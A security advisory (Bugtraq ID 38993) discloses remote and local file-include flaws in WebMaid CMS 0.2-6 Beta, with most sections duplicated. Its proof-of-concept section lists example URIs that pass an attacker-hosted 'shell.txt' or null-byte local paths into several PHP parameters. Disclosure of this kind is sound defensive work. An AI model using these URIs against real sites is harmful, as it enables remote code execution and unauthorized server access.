WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
BID:38993
Info
WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
| Bugtraq ID: | 38993 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1266 CVE-2010-1267 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | cr4wl3r |
| Vulnerable: |
WebMaid CMS WebMaid CMS 0.2-6 Beta |
| Not Vulnerable: | |
Discussion
WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
WebMaid CMS is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the webserver process. This may facilitate unauthorized access.
WebMaid CMS 0.2-6 Beta is vulnerable; other versions may also be affected.
WebMaid CMS is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the webserver process. This may facilitate unauthorized access.
WebMaid CMS 0.2-6 Beta is vulnerable; other versions may also be affected.
Exploit / POC
WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/template/babyweb/index.php?template=[attacker.com]/shell.txt???
http://www.example.com/template/babyweb/index.php?menu=[attacker]/shell.txt???
http://www.example.com/template/babyweb/index.php?events=[attacker]/shell.txt???
http://www.example.com/template/babyweb/index.php?SITEROOT=[attacker]/shell.txt???
http://www.example.com/template/calm/footer.php?modules=[attacker]/shell.txt???
http://www.example.com/template/calm/footer.php?copyright=[attacker]/shell.txt???
http://www.example.com/template/calm/top.php?menu=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?modules=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?copyright=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?menu=[attacker]/shell.txt???
http://www.example.com/cContactus.php?com=[LFI%00]
http://www.example.com/cGuestbook.php?com=[LFI%00]
http://www.example.com/cArticle.php?com=[LFI%00]
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/template/babyweb/index.php?template=[attacker.com]/shell.txt???
http://www.example.com/template/babyweb/index.php?menu=[attacker]/shell.txt???
http://www.example.com/template/babyweb/index.php?events=[attacker]/shell.txt???
http://www.example.com/template/babyweb/index.php?SITEROOT=[attacker]/shell.txt???
http://www.example.com/template/calm/footer.php?modules=[attacker]/shell.txt???
http://www.example.com/template/calm/footer.php?copyright=[attacker]/shell.txt???
http://www.example.com/template/calm/top.php?menu=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?modules=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?copyright=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?menu=[attacker]/shell.txt???
http://www.example.com/cContactus.php?com=[LFI%00]
http://www.example.com/cGuestbook.php?com=[LFI%00]
http://www.example.com/cArticle.php?com=[LFI%00]
Solution / Fix
WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
References:
References:
- WebMaid CMS Homepage (WebMaid CMS)